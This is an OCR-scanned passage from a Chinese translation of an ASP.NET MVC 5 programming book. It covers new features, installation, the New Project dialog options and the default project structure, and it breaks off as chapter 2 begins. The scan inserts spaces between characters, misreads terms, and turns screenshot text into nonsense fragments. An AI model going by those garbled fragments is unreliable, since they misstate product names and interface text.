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所 以 可 以 获得 我 们 在 使 用 Entity Framework Code First 时 已 经 习惯 了 的 简单 性 和 控制 。 
但 是 ， 也 可 以 插入 其 他 任何 我 们 希望 使 用 的 持久 化 机 制 ， 包 括 其 他 ORM、 数 据 库 、 
自 定义 的 Web 服 务 等 。 

e 可 测试 性 : ASPNET Identity API 是 使 用 接口 设计 的 ， 所 以 允许 为 用 户 相 关 的 应 用 程 
序 代码 编写 单元 测试 。 

e 基于 声明 : 虽然 ASPNET Identity 仍 然 支持 用 户 角色 ， 但 是 也 支持 基于 声明 的 身份 验 
证 。 声 明 的 表达 力 比 角 色 强 许多 ， 所 以 给 我 们 提供 了 更 大 的 能 力 和 灵活 性 。 角 色 成 员 
关系 是 一 个 简单 的 布尔 值 (用 户 或 者 是 、 或 者 不 是 管理 员 角 色 )， 而 用 户 声明 可 以 包含 
丰富 的 信息 ， 比 如 用 户 的 成 员 级 别 或 身份 细节 。 

e 登录 提供 器 : ASP.NET Identity 并 不 是 只 关注 用 户 名 /密码 身份 验证 ， 而 是 也 理解 用 户 
经 常 通过 社交 服务 提供 器 (如 Microsoft Account、Facebook 或 Twitter) 和 Windows Azure 
Active Directory 进 行 身份 验证 。 

e NuGet 分 发 ， ASPNET Identity 作 为 NuGet 包 安装 到 应 用 程序 中 。 这 意味 着 可 以 单独 安 
装 ASPNET Identity， 并 且 通 过 更 新 一 个 NuGet 包 ， 就 可 以 把 它 升 级 到 新 版 本 。 

第 7 章 将 详细 讨论 ASPNET Identity。 


1.2.4 ”Bootstrap 模 板 

MVC 1 项 目的 默认 模板 的 视觉 设计 一 直到 MVC 3 都 没有 改变 。 创 建 并 运行 一 个 新 MVC 
项 目 时 ， 得 到 的 是 蓝 色 背景 ， 其 上 有 一 个 白色 方 框 ， 如 图 1-1 所 示 ( 本 书 没有 采用 彩色 印刷 ， 
所 以 看 不 出 蓝 色 ， 但 是 读者 可 以 理解 这 个 大 概 思想 )。 


Cee p- Rox] S tenero 


My MVC Application 


Welcome to ASP.NET MVC! 


To learn more about ASP.NET MVC visit http: //asp.net/mvc. 


图 1-1 


在 MVC 4 中 ,重新 设计 了 默认 模板 的 HIML 和 CSS， 使 其 默认 的 视觉 设计 也 能 拿 得 出 手 。 
而 且 ， 在 不 同 的 屏幕 分 辨 率 下 ， 默 认 模 板 的 HTML 和 CSS 也 工作 得 很 好 。 但 是 ，MVC 4 默认 
模板 的 HTML 和 CSS 都 是 自 定义 的 ， 这 不 够 理想 。 视 觉 设计 的 更 新 与 MVC 的 产品 发 布 周 期 捆 
绑 在 一 起 ， 所 以 很 难 与 Web 开 发 社区 分 享 设计 模板 。 

在 MVC 5 中 ， 项 目 模板 改 为 运行 在 流行 的 Bootstrap 框 架 上 。Bootstrap 最 初 由 Twitter 的 一 
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名 开发 人 员 和 一 名 设计 师 创 建 ， 他 们 后 来 离开 了 Twitter， 专 注 于 Bootstrap 的 开发 。MVC 5 的 
默认 设计 实际 上 看 起 来 就 像 可 以 部 署 到 生产 环境 的 样子 ， 如 图 1-2 所 示 。 


ASP.NET 


ASP.NETis afree web framework for building great Web sites and Web applications 
using HTML, CSS and JavaScript. 


Getting started Get more libraries Web Hosting 


ASP.NET MVC powes at iy ma 


Lear 


62014 - My ASP.NET Application 


图 1-2 
更 好 的 是 ， 因 为 Bootstrap 框 架 在 Web 开 发 人 员 群 体 中 获得 了 很 高 的 接受 度 ， 所 以 在 
http://wrapbootstrap.com 和 http://bootswatch.com 上 可 以 获得 大 量 的 、 多 种 多 样 的 Bootstrap 主 题 
(有 人 免费 的 ， 也 有 付费 的 )。 例 如 ， 图 1-3 显 示 了 使 用 Bootswatch 免 费 提 供 的 Slate 主 题 创建 的 一 
个 默认 MVC 5 应 用 程序 。 


e o M TT) 


Application name tome Anos 


ASP.NET 


Getting started Get more libraries 


图 1-3 
第 16 章 在 介绍 如 何 针对 移动 Web 浏 览 器 优化 MVC 应 用 程序 时 ， 将 详细 讨论 Bootstrap。 


12.5 ”特性 路 由 


特性 路 由 是 一 种 新 的 指定 路 由 的 方法 ， 可 将 注解 添加 到 控制 器 类 或 操作 方法 上 。 流 行 的 
AttributeRouting 开 源 项 目 (http://attributerouting.net) 使 这 种 方法 成 为 可 能 。 
第 9 章 将 详细 讨论 特性 路 由 。 


1.2.6 ASPNET 基 架 


基 架 是 基于 模型 类 生成 样板 代码 的 过 程 。MVC 从 版 本 1 开始 就 有 了 基 架 ， 但 是 仅 限 于 
MVC 项 目 使 用 。 新 的 ASPNET 基 架 系 统 可 以 在 任何 ASPNET 应 用 程序 中 工作 。 另 外 ， 它 还 支 
持 构 建 强大 的 自 定义 基 架 ， 使 其 具有 自 定义 对 话 框 和 完善 的 基 架 API。 

第 3 章 和 第 4 章 将 讨论 基 架 基础 ， 第 16 章 将 介绍 扩展 基 架 系统 的 两 种 方式 。 


127 ”身份 验证 过 滤器 
MVC 很 久 以 来 一 直 支 持 认证 过 滤器 的 功能 , 允许 基于 角色 身份 或 其 他 自 定义 逻辑 来 限制 
对 控制 器 或 操作 的 访问 。 但 是 , 在 第 7 章 将 会 看 到 ,身份 验证 (确定 用 户 是 谁 ) 和 授权 (经 过 身份 
验证 的 用 户 能 够 做 什么 ) 之 间 存 在 一 个 重要 的 区 别 。 新 增 的 身份 验证 过 滤器 先 于 授权 过 滤器 执 
行 ， 从 而 允许 访问 ASPNET Identity 提 供 的 用 户 声明 ， 以 及 运行 自 定义 的 身份 验证 逻辑 。 
第 15 章 将 详细 讨论 身份 验证 过 滤器 。 
1.28 ”过 滤器 重 写 
过 滤器 是 一 项 高 级 MVC 特 性 ， 人 允许 开发 人 员 参 与 操作 和 结果 执行 管道 。 过 滤器 重 写意 味 


着 可 以 使 某 个 控制 器 或 操作 不 执行 全 局 过 滤器 。 
第 15 章 将 详细 介绍 过 滤器 ， 包 括 过 滤器 重 写 。 


1.3 安装 MVC 5 和 创建 应 用 程序 


学 习 MVC 5 工作 原理 最 好 的 方法 就 是 开始 构建 一 个 应 用 程序 ， 下 面 就 采用 这 种 方法 。 


1.3.1 ASP.NET MVC 5 的 软件 需求 


MVC 5 需要 .NET 4.5。 因 此 ， 它 可 以 运行 在 下 面 这 些 Windows 客 户 端 操作 系统 上 : 
e Windows Vista SP2 

e Windows 7 

e Windows 8 

也 可 以 运行 在 下 面 的 服务 器 操作 系统 上 : 

e Windows Server 2008 R2 

e Windows Server 2012 
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1.3.2 安装 ASPNET MVC 5 


确定 满足 基本 的 软件 需求 后 ， 就 可 以 在 开发 计算 机 和 生产 环境 计算 机 上 安装 ASPNET 
MVC 5 了 。 安装 起 来 十 分 简单 。 


与 之 前 的 MVC 版 本 并 行 安装 
MVC 5 与 以 前 的 MVC 版 本 并 行 安装 ， 所 以 安装 后 可 以 立即 开始 使 用 MVC 5。 另 外 ， 仍 然 
能 创建 和 更 新 运行 以 前 版 本 的 应 用 程序 。 


1. 安装 MVC 5 开发 组 件 


ASPNET MVC 5 的 开发 工具 支持 Visual Studio 2012 和 Visual Studio 2013, 包括 这 两 个 产品 
的 免费 Express 版 本 。 

Visual Studio 2013 中 包含 MVC 5， 所 以 不 需要 单独 安装 。 如 果 使 用 的 是 Visual Studio 2012, 
则 可 以 使 用 这 个 安装 程序 来 安装 MVC 5， 网 址 是 http://www.microsoft.com/en-us/download/ 
41532。 注 意 ， 本 书 中 的 所 有 屏幕 截图 显示 的 是 Visual Studio 2013， 而 不 是 Visual Studio 2012. 


2. 服务器 安装 


MVC 5 是 完全 bin 部 署 的 ， 这 意味 着 所 有 必要 的 程序 集 都 包含 在 应 用 程序 的 bin 目 录 中 。 
只 要 服务 器 上 有 .NET 4.5， 就 可 以 进行 安装 。 


1.3.8 创建 ASPNET MVC 5 应 用 程序 


使 用 Visual Studio 2013 或 Visual Studio 2013 Express for Web 2013 可 以 创建 MVC 5 应 用 程 
序 。 这 两 个 IDE 的 开发 经 验 是 非常 相似 的 ， 因 为 本 书 是 .NET 高 级 编程 系列 的 书籍 之 一 ， 所 以 
我 们 将 专注 于 Visual Studio 开 发 ， 只 有 当 二 者 存在 显著 差异 


时 ， 才 会 提 到 Visual Web Developer。 Md ere VEM SO End 
MVC Music Store 。 es Saar | 
本 书 将 零散 地 依据 MVC Music Store 教 程 中 的 一 些 例 |© seme oo 

子 进 行 介绍 。 这 个 教程 (下 载 网 址 为 pen nime 

http://mvcmusicstore.codeplex.com) 是 一 个 电子 书 ， 里 面 涵 Open Fle. ceio 


盖 了 构建 一 个 ASPNETMVC 应 用 程序 的 基本 知识 。 本 书 会 
更 深入 地 进行 讲解 ,但 是 如 果 需 要 更 多 的 介绍 主题 的 信息 ， 


有 共同 的 基础 是 不 错 的 。 ee 
创建 一 个 新 的 MVC 项 目的 步骤 如 下 : c 
(1) 选择 File | New Project 选 项 ， 如 图 1-4 所 示 。 
(2) 在 New Project 对 话 框 左 栏 的 Installed Templates 部 & M ERES 
分 ， 选 择 Visual C# | Web 模 板 列表 ， 这 将 在 中 间 栏 显示 Web |a ee aen 
应 用 程序 类 型 列表 ， 如 图 1-5 所 示 。 m 


Search Installed Templates (Cu 日 a D 


Type: Visual C= 
A project template for creating ASP.NET 


Click here to go onfne and find templates 


Mucusictond 

DUsers don Documents Vsus Studio 2013 Wo - 

MveMusicstore f Creste directory for solution 
L Add to source control 


ok. 


图 1-5 
(3) 选择 ASPNET Web Application, 将 应 用 程序 命名 为 MvcMusicStore, 然后 单 击 OK 按 钮 。 


One ASP.NET 项 目 模 板 


注意 , 这 里 没有 MVC 项 目 类 型 ,只 有 ASPNET Web Application。 以 前 版 本 的 Visual Studio 
和 ASPNET 为 MVC 使 用 不 同 的 项 目 类 型 ， 但 是 在 Visual Studio 2013 中 ， 它 们 被 合并 成 一 个 公 
共 的 项 目 类 型 。 


1.3.4 NewASPNET Project 对 话 框 


创建 一 个 新 的 MVC 5 应 用 程序 后 ， 将 会 出 现 New ASPNET Project 对 话 框 ， 如 图 1-6 所 示 。 
该 对 话 框 列 出 了 所 有 ASPNET 应 用 程序 共有 的 一 些 选项 : 


A project template for creating ASP.NET MVC applications. 


includes many features that enable fast, test-driven 
development for creating applications that use the latest 
standards. 


Add folders and core references for: 
LlWebFoms | MVC [7] Web API 


C Add unit tests 


Tetprojecname  MvcMusicStore Tests 
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e 选择 模板 

o 添加 框架 特定 的 文件 夹 和 核心 引用 

e 添加 单元 测试 

e 配置 身份 验证 

e Windows Azure(Visual Studio 2013.2 及 更 新 版 本 ) 

前 两 个 选项 (Select a template 和 Add folders and core references for) 共 同 起 作用 。 模 板 选 择 
了 一 个 起 点 ， 然 后 使 用 框架 复 选 框 来 添加 对 Web Forms、MVC 和 Web API 的 支持 。 这 意味 着 
我 们 可 以 选择 一 个 MVC 模 板 ， 然 后 添加 Web Forms 支 持 ， 或 者 可 以 选择 空 模板 ， 添 加 对 任意 
框架 的 支持 。 这 种 功能 不 只 在 创建 新 项 目 时 可 以 使 用 ， 任 何 时 候 都 可 以 添加 对 任意 框架 的 支 
持 ， 因 为 框架 文件 夹 和 核心 引用 是 通过 NuGet 包 添加 的 。 

回忆 前 面 的 “One ASPNET” 一 节 讨论 过 的 内 容 : 模板 和 核心 引用 的 选择 是 可 选项 ， 而 
不 是 艰难 的 二 选 一 。 它 们 能 够 帮助 我 们 起 步 ， 但 是 不 会 限制 我 们 。 


1. 选择 一 种 应 用 程序 模板 


既然 可 以 在 任何 项 目 上 使 用 Add folders and core references for 选 项 ， 那 么 使 用 Empty 模板 
不 就 够 了 吗 ? 为 什么 还 需要 其 他 模板 ? 这 是 因为 ,其 他 模板 会 在 一 开始 为 “主要 采用 MVC”、 
“主要 采用 Web API” 和 “主要 采用 Web Forms” 的 应 用 程序 做 一 些 常用 设置 ( 稍 后 的 列表 将 
会 介绍 )， 从 而 为 我 们 提供 方便 。 本 节 将 对 这 些 模板 进行 介绍 。 不 过 要 记 住 ， 它 们 只 是 Visual 
Studio 2013 为 了 方便 我 们 而 提供 的 , 并 不 是 必须 使 用 它们 ; 我 们 也 可 以 使 用 一 个 Empty 模板 开 
始 创建 应 用 程序 ， 并 在 两 周 之 后 ， 通 过 添加 NuGet 包 来 加 入 对 MVC 的 支持 。 
e MVC: 首先 介绍 这 个 最 常用 的 模板 。MVC 模 板 设置 一 个 标准 的 、 带 几 个 视图 的 Home 
Controller， 配 置 站 点 布局 ， 并 包含 一 个 MVC 特 定 的 Project_ Readme.html 页 面 。 下 一 节 
将 详细 研究 这 个 模板 。 
e Empty: 可 以 想见 ， 空 模板 会 建立 一 个 空 的 项 目 骨 架 。 得 到 的 文件 包括 一 个 
web.config( 包 含 一 些 默认 的 网 站 配置 设置 ) 和 创建 项 目 所 需 的 几 个 程序 集 引 用 , 但 是 仅 
此 而 已 。 这 个 模板 不 会 提供 代码 ， 不 包含 JavaScript 或 CSS 脚 本 ， 甚 至 不 会 提供 一 个 静 
态 的 HTML 文件 。 
e WebForms: Web Forms 模 板 为 ASPNET Web Forms 开 发 打下 基础 。 


注意 ”如果 对 Web Forms 开 发 感 兴趣 ， 可 以 阅读 Wrox 的 图 书 《ASPNET 4.5 高 级 
| ”编程 (第 8 版 )》( 清 华 大 学 出 社 引 进 并 出 版 ) 以 获得 更 多 信息 。 这 里 列 出 这 个 选项 ， 
| 只 是 因为 我 们 可 以 使 用 Web Forms 模 板 创建 一 个 项 目 ， 然 后 为 其 添加 MVC 支 持 。 
e Web API: 使 用 此 模板 创建 的 应 用 程序 同时 支持 MVC 和 Web API。 包含 MVC 支 持 ， 部 
分 是 为 了 显示 API Help 页 面 ， 它 们 记录 了 公有 API 签 名 。 第 11 章 将 详细 讨论 Web API。 
e Single Page Application: Single Page Application 模 板 创 建 的 应 用 程序 主要 通过 
JavaScript 请 求 Web API 服 务 驱动 ， 而 不 是 采用 传统 的 Web 页 面 请 求 /响应 周期 。 最 初 的 
HTML 由 一 个 MVC Home Controller 提 供 , 其 余 的 服务 器 端 交互 则 由 一 个 Web API 控 制 


91€ 入 0 


器 处 理 。 此 模板 使 用 Knockoutjs 库 来 帮助 管理 浏览 器 中 的 交互 。 第 12 章 将 介绍 单 页 面 
应 用 程序 ， 不 过 该 章 的 重点 是 Angularjs 库 ， 而 不 是 Knockoutjs 库 。 

e Facebook: 这 个 模板 方便 了 构建 一 个 Facebook“ 画 布 ”应 用 程序 ， 也 就 是 看 上 去 托管 
在 Facebook 网 站 上 的 一 个 Web 应 用 程序 。 此 模板 不 在 本 书 讨论 范围 内 ， 更 多 信息 可 阅 
读 : http://go.microsoft.com/fwlink/?LinkId=301873 上 的 教程 。 


注意 Facebook API 的 变化 导致 在 编写 本 书 时 , Facebook 模 板 的 授权 重 定向 
存在 问题 。 位 于 以 下 网 址 的 CodePlex 问 题 描述 详细 说 明了 这 个 问题 : 
https://aspnetwebstack.codeplex.com/workitem/1666。 修 复 问题 很 可 能 需要 更 新 或 
替换 Microsoft.AspNet.Mvc.Facebook NuGet 包 .参考 以 上 网 址 来 了 解 这 个 bug 的 状 
| “ 态 描述 以 及 修复 信息 。 


e Azure Mobile Service: 安装 Visual Studio 2013 Update 2( 也 叫做 2013.2) 以 后 ， 会 看 到 这 
个 额外 的 选项 。 因 为 Azure Mobile Services 现 在 支持 Web API 服 务 ， 所 以 使 用 这 个 模板 
能 够 比较 容易 地 创建 针对 Azure Mobile Services 的 Web API。 在 下 面 这 个 教程 中 可 以 了 
解 关 于 此 模板 的 更 多 信息 : http://msdn.microsoft.com/en-us/library/windows/apps/xaml/ 
dn629482.aspx。 


2. 测试 
所 有 的 内 置 项 目 模板 都 有 一 个 选项 ， 用 来 使 用 样本 单元 测试 创建 单元 测试 项 目 。 


推荐 : 选中 复 选 杠 

笔者 建议 养 成 在 创建 项 目 时 选中 Add Unit Tests 复 选 框 的 习惯 。 

本 书 将 向 你 “推销 ”单元 测试 的 “信仰 ”一 一 不 仅仅 是 这 样 ， 单 元 测试 贯穿 全 书 ， 在 第 
14 章 中 将 专门 进行 介绍 , 其 中 涵盖 了 单元 测试 和 测试 模式 , 但 不 会 强制 你 非得 接受 这 个 观点 。 

曾经 与 笔者 交谈 的 大 部 分 开发 人 员 都 一 致 认为 单元 测试 非常 重要 。 那 些 不 用 单元 测试 的 
人 员 想 用 ， 但 又 担心 太 难 。 他 们 不 知道 从 哪里 入 手 ， 担 心 会 出 错 ， 会 瘫痪 掉 。 笔 者 理解 他 们 
的 感受 ， 因 为 笔者 也 有 过 这 样 的 经 历 。 

本 书 的 推销 方式 : 只 需要 选中 这 个 复 选 框 。 没 必要 知道 为 什么 要 这 样 做 ， 也 不 需要 
ALT.NET tattoo 或 认证 。 本 书 涵盖 一 些 入 门 级 的 单元 测试 内 容 , 但 是 单元 测试 入 门 的 最 好 方式 
是 仅仅 选中 这 个 复 选 框 ， 后 面 可 以 在 不 设置 任何 内 容 的 情况 下 编写 一 些 测试 代码 。 


3. 配置 身份 验证 


单 击 Change Authentication 按 钮 ， 可 打开 如 图 1-7 所 示 的 Change Authentication 对 话 框 ， 从 
中 可 选择 身份 验证 方法 。 
对 话 框 中 列 出 了 4 个 选项 : 
e No Authentication: 用 于 不 需要 身份 验证 的 应 用 程序 ， 例 如 没有 管理 单元 的 公共 网 站 。 
e Individual User Accounts: 用 于 在 本 地 存储 用 户 配 置 文件 (如 在 SQL Server 数 据 库 中 存 
储 ) 的 应 用 程序 。 支 持 用 户 名 /密码 账号 ， 以 及 社交 认证 提供 程序 。 
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For applications that store user profiles in a SQL Server database. Users can register, 
or sign in using their existing account for Facebook, Twitter, Google, Microsoft, or 
lei fru another provider. 


- Leam more 
® Individual User Accounts 


(C) Organizational Accounts 


O Windows Authentication 


图 1-7 


e Organizational Accounts: 用 于 通过 某 种 形式 的 活动 目录 (包括 Azure Active Directory 和 
Office 365) 进 行 身份 验证 的 账户 。 
e Windows Authentication: 用 于 内 部 网 应 用 程序 。 
本 书 大 部 分 时 候 使 用 Individual User Accounts。 第 7 章 将 讨论 其 他 选项 。 可 在 Change 
Authentication 对 话 框 中 单 击 每 个 选项 的 Leam More 链 接 ， 查 看 对 应 的 官方 文档 。 


4. 配置 Windows Azure 资源 


Visual Studio 2013.2 添 加 了 额外 的 “Host in the cloud” 选 项 ， 用 于 直接 在 File | New Project 
对 话 框 中 为 项 目 配 置 Azure 资 源 。 关 于 此 选项 的 更 多 信息 ， 可 阅读 此 教程 : 
http://azure.microsoft.com/en-us/documentation/articles/web-sites-dotnet-get-started/。 本 章 中 ， 我 
们 将 使 用 本 地 开发 服务 器 ， 所 以 确保 不 要 选中 该 复 选 框 。 

检查 New ASPNET Project 对 话 框 中 的 设置 ， 确 保 与 图 1-8 所 示 相同 ， 然 后 单 击 OK 按钮 。 


Select a template: 
A project template for creating ASP.NET MVC applications. 


il Ii s ASP.NET MVC allows you to build applications using the 
2 d al Model-View-Controller architecture. ASP.NET MVC 
" includes many features that enable fast, test-driven 
er owe ME Sen development for creating applications that use the latest 
1 :1 standards. 
es 加 
SinglePage ~ Facebook ^ Azure Mobile Leam more 
 Applicalion Senin 


Change Authentication 


Authentication: Individual User Accounts 
Add folders and core references for: S3 Windows Azure 
口 webFoms MVC [C] Web Api © C] Hestin the cloud 
Web Site 
Signed in as jongalloway@ gmail.com 
Manage Subscriptions 


[Z] Add unit tests 


第 1 章 入 nn 


这 将 创建 一 个 解决 方案 ， 其 中 包含 两 个 项 目 : 用 于 Web 应 用 程序 ， 一 个 用 于 单元 测试 ， 


如 图 1-9 所 示 。 


This application 
consists of: 


图 1-9 


FP- 5x 
| 


OS rR à 
icu.) Pe 


新 MVC 项 目 在 应 用 程序 的 根 目录 下 包含 Project Readme .html 文 件 。 创 建 项 目 时 将 自动 显 
示 这 个 文件 ， 如 图 1-9 所 示 。 这 是 一 个 完全 自 包含 的 文件 一 一 所 有 的 样式 都 通过 HTMLI 样式 标 


签 包含 进来 ， 所 以 使 用 完 该 文件 后 可 以 删除 它 。 


1.4 ASP.NET MVC 应 用 程序 的 结构 


用 Visual Studio 创 建 了 一 个 新 的 ASPNET MVC 应 用 程 
序 后, 将 自动 向 这 个 项 目 中 添加 一 些 文件 和 目录 , 如 图 1-10 
所 示 。 用 Internet Application 模 板 创建 ASPNET MVC 项 目 后 
有 8 个 顶级 目录 ， 如 表 1-1 所 示 。 


人 ©- 


b £ Properties 
wa References 
38 App, Data 


= 


S App. Start 
E Content 
398 Controllers. 
H fonts 

S Models 

S Scripts 

S Views 

B faviconico 
41 Globalasax 


7" vvvvvvv 


b C* Startup.cs 
PÀ Web.config 


- 


图 1- 


MusicStore "DX 
ada + 
Search Solution Explorer - MvcMusicStore D ~ 


z Solution 'MvcMusicStore' (2 == 


23 packages.config 
[À Project Readme.html 


b E] MvcMusicstore.Tests 


Project Readme.html 文 件 针 对 每 个 应 用 程序 
模板 定制 ， 并 且 包 含 大 量 有 用 的 链接 ， 它 们 有 助 于 我 们 了 解 相关 信息 。 
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表 1-1 默认 的 顶级 目录 


目 录 用 途 
/Controllers 该 目录 用 于 保存 那些 处 理 URL 请 求 的 Controller 类 
/Models 该 目录 用 于 保存 那些 表示 和 操纵 数据 以 及 业务 对 象 的 类 
/Views 该 目录 用 于 保存 那些 负责 呈现 输出 结果 (如 HTML) 的 UI 模板 文件 
/Scripts 该 目录 用 于 保存 JavaScript 库 文件 和 脚本 (.js) 
/fonts 该 目录 用 于 保存 Bootstrap 模 板 系 统 包 含 的 一 些 自 定义 Web 字 体 
/Content 该 目录 用 于 保存 CSS、 图 像 和 其 他 站 点 内 容 ， 而 非 脚 本 
/App_Data 该 目录 用 于 存储 想 要 读 取 / 写 入 的 数据 文件 
/App Start. 该 目录 用 于 保存 一 些 功能 的 配置 代码 ， 如 路 由 、 捆 绑 和 Web API 


如 果 不 喜 欢 这 个 目录 结构 ， 怎 么 办 ? 


ASPNET MVC 并 不 是 非 要 这 个 结构 。 事实 上 , 那些 处 理 大 型 应 用 程序 的 开发 人 员 通 常 跨 
多 个 项 目 来 分 割 应 用 程序 ， 以 便 使 应 用 程序 更 易于 管理 (例如 ,数据 模型 类 常常 位 于 一 个 来 自 
Web 应 用 程序 的 单独 的 类 库 项 目 中 )。 然 而 ， 默 认 的 项 目 结构 确实 提供 了 一 个 很 好 的 默认 目录 
约定 ， 使 得 应 用 程序 的 关注 点 很 清晰 。 

当 进行 扩展 时 ， 请 注意 关于 这 些 文件 或 文件 夹 的 以 下 内 容 : 

e /Controllers 目 录 ， 展 开 该 目录 ， 将 会 发 现 Visual Studio 默 认 向 该 项 目 中 添加 了 两 个 


Controller 类 (如 图 1-11 所 示 ) 


HomeController 和 AccountController。 


e /Views 目 录 ， 展 开 该 目录 ， 将 会 发 现 3 个 子 目录 (/Account、/Home 和 /Shared) 以 及 其 中 
的 一 些 模板 文件 ， 这 些 子 目录 也 是 默认 添加 到 该 项 目 中 的 (如 图 1-12 所 示 )。 
[Souten piore- MMsicstoe ~ Ox | 


sl] Solution MvcMusicStore' (2 projects) 
4 8] MvcMusicStore 

# Properties 

wu References 

Si App Data 

MM App. Start 

48 Content. 


4 c Account 


b €* AccountController.cs. 
b œœ HomeController.cs. 
48 fonts 


» 
b i Modek 
b i Scripts 
P Wb Viens 
B favicon.ico 
b E) Globalasax 加 Layout.cshtmi 
7 packages.config. 1) LoginPartial.cshtmi 
D Project Readme html T Error.cshtml 
Pipe tei Vesta csl 
P Webconfg 
»o Weeds — — — |  — — | w vico 
b E] MvdMusicstoreTests 5223 soe! A 
] 1 
图 1-11 图 1-12 


e /Content 和 /Scripts 目 录 ， 展 开 这 两 个 目录 ， 将 发 现 几 个 CSS 文 件 (用 于 调整 站 点 上 所 有 
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HIMI 文件 的 样式 ) 以 及 JavaScript 库 (可 以 启用 应 用 程序 中 的 jQuery 支持 )， 如 图 1-13 所 示 。 
e MvcMusicStore.TestsJji H, 展开 该 项 目 , 将 发 现 一 个 类 , 其 中 含有 对 应 于 HomeController 
类 的 单元 测试 (如 图 1-14 所 示 )。 


国 bootstrap.cis 


D bootstrapminjs fig 
D jquery-1.102intellsenzeje T Project Readmne html 
D jquey-1102js P C Stanups 
四 Web.confi 
b Je Properties 
b HR References 
S Controllers 


4 €* HomeControllerTestcs 
4 3 HomeControllerTest. 


图 1-14 

这 些 由 Visual Studio 添 加 的 默认 文件 提供 了 一 个 可 以 运行 的 应 用 程序 的 基本 结构 , 完整 地 
包括 了 首页 、 关 于 页 面 、 账 户 登录 /退出 /注册 页 面 以 及 一 个 未 经 处 理 的 错误 页 面 (所 有 页 面 彼 
此 联系 起 来 ， 可 以 直接 使 用 )。 


1.4.1 ASPNET MVC 和 约定 


默认 情况 下 ，ASPNET MVC 应 用 程序 对 约定 的 依赖 性 很 强 。 这 样 就 避免 了 开发 人 员 配 
置 和 指定 一 些 项 ， 因 为 这 些 项 可 以 根据 约定 来 推断 。 

例如 ， 当 解析 视图 模板 时 ，ASPNET MVC 采 用 一 种 基于 约定 的 目录 命名 结构 ， 这 个 约 
定 可 以 实现 当 从 Controller 类 中 引用 视图 时 ,省略 位 置 路 径 信 息 。 默认 情况 下 , ASPNET MVC 
会 在 应 用 程序 下 的 \Views\[ControllerName 四 目录 中 查找 视图 模板 文件 。 

设计 ASPNET MVC 是 围绕 一 些 基于 约定 的 默认 项 ， 这 些 默 认 项 在 需要 的 时 候 可 以 被 覆 
盖 。 这 个 概念 通常 称 为 “约定 优 于 配置 ”。 


1.4.2 ”约定 优 于 配置 


几 年 前 ， 在 Ruby on Rails 上 约定 优 于 配置 的 概念 流行 开 来 ， 它 的 本 质 意义 在 于 : 


到 目前 为 止 , 你 已 经 知道 如 何 创建 Web 应 用 程序 。 现在 将 以 前 积累 的 经 验 应 用 于 框架 中 ， 
以 后 开发 就 没 必要 再 配置 每 一 项 。 
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通过 查看 应 用 程序 运行 的 三 个 核心 目录 ， 可 在 ASPNET MVC 中 看 到 这 一 概念: 

e Controllers 

e Models 

e Views 

没 必要 在 web.config 文 件 中 设置 这 些 文件 夹 名 称 一 一 它们 约定 在 配置 文件 中 。 这 样 就 避免 
了 编辑 XML 文 件 (如 web.config) 来 显 式 地 告诉 MVC 引 擎 “可 以 在 Views 目 录 中 查找 程序 视图 ” 

这 不 是 魔术 。 实 际 上 又 是 ; 但 不 是 黑 魔术 一 一 那 种 结果 出 人 意料 的 魔术 (确实 可 以 伤害 到 
Ba). 

ASPNET MVC 的 约定 非常 容易 理解 。 下 面 是 预期 的 程序 结构 : 

e 每 个 Controller 类 的 名 字 以 Controller 结 尾 一 一 ProductController、HomeController 等 ， 这 
些 类 在 Controllers 目 录 中 。 
应 用 程序 的 所 有 视图 放 在 单独 的 Views 目 录 下 。 
控制 器 使 用 的 视图 是 在 Views 主 目录 的 一 个 子 目 录 中 ， 这 个 子 目录 是 根据 控制 器 名 称 
(后 面 减 去 Controller 后 缀 ) 来 命名 的 。 例如， 前 面 讨论 的 ProductController 使 用 的 视图 就 
放 在 /Views/Product 目 录 中 。 

所 有 可 重用 的 UI 元 素 都 位 于 一 个 相似 的 结构 中 ， 只 不 过 是 放 在 Views 文 件 夹 的 一 个 共享 
目录 中 。 这 些 内 容 在 第 3 章 中 会 进行 详细 介绍 。 


1.4.3 约定 简化 通信 


编写 代码 进行 通信 主要 面向 两 类 不 同 的 听众 : 

。 需要 将 清晰 的 无 二 义 性 的 指令 传递 给 计算 机 ， 让 它 来 执行 。 

e 需要 让 开发 人 员 读 懂 你 的 代码 ， 以 便 后 期 维护 、 调 试 以 及 完善 。 

前 面 已 经 讨论 了 约定 优 于 配置 如 何 高 效 地 将 你 的 想法 意图 传达 给 MVC。 约定 也 能 帮助 你 
清晰 地 与 其 他 开发 人 员 ( 包 括 以 后 的 自己 ) 进 行 交 流 。 不 必 详 细 地 描述 如 何 构建 应 用 程序 的 每 
一 方面 ， 按 照 共 同 的 约定 可 以 使 世界 上 所 有 的 ASPNET MVC 开 发 人 员 公用 共同 的 基线 
(baseline). 通常 情况 下 , 软件 设计 模式 的 优势 之 一 是 它们 建立 了 一 种 标准 语言 。 由 于 ASPNET 
MVC 采 用 了 MVC 模 式 以 及 一 些 独特 约定 ， 这 使 得 ASPNET MVC 开 发 人 员 能 够 很 轻松 地 理解 
不 是 自己 编写 的 代码 或 以 前 编写 但 现在 忘记 了 的 代码 ， 即 便 在 大 的 应 用 程序 中 也 是 如 此 。 


15 小 结 


本 章 涵盖 了 很 多 内 容 。 首 先 对 ASPNETMVC 进 行 了 介绍 , 展示 了 ASPNET Web 框 架 和 MVC 
软件 模式 如 何 结合 起 来 为 构建 Web 应 用 程序 提供 功能 强大 的 系统 。 回 顾 了 ASPNET MVC 经 由 4 
个 版 本 发 展 成 熟 的 历程 , 深入 讲解 了 ASPNET MVC 5 的 特性 及 其 关注 点 。 介 绍 完 背景 知识 后 ， 
我 们 设置 开发 环境 并 开始 创建 MVC 5 示例 应 用 程序 。 最 后 介绍 了 ASPNET MVC 5 应 用 程序 的 
结构 和 组 件 。 后 续 章 节 将 更 加 详细 地 介绍 这 些 组 件 ， 下 面 将 从 第 2 章 的 控制 器 开始 。 
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本 章 主要 内 容 

e 控制 器 的 角色 

e 示例 应 用 程序 : MVC Music Store 
e 控制 器 基础 


本 章 阐述 控制 器 如 何 响应 用 户 的 HTTP 请 求 并 将 处 理 的 信息 返回 给 浏览 器 ; 重点 介绍 控 
制 器 和 控制 器 操作 的 功能 。 由 于 到 目前 为 止 尚 未 涉及 视图 和 模型 ， 因 此 本 章 中 有 关 控制 器 行 
为 的 示例 会 有 些 超前 。 不 过 本 章 内 容 为 接 下 来 几 章 的 学 习 葛 定 了 基础 。 

第 1 章 首 先 概括 地 介绍 了 MVC 模 式 ， 随 后 对 ASPNET MVC 和 ASPNET Web Forms 进 行 了 
